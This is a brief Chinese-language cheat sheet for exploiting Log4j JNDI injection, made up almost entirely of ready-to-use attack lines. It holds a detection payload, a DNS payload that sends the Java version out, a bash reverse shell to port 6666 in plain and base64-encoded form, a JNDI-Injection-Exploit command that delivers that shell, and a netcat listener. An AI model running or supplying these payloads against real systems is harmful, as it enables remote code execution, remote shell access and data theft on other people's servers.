jndi测试payload:
${jndi:ldap://dnslog子域名}
查看dnslog:
外带数据:
action=${jndi:ldap://${sys:java.version}2c8ae29154.ipv6.1433.eu.org.}
getshell:
Runtime.exec Payload Generater | AresX's Blog
bash -i >& /dev/tcp/攻击机器ip/6666 0>&1
进行编码:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "攻击机器ip"
监听本地端口:
nc -lvvp 6666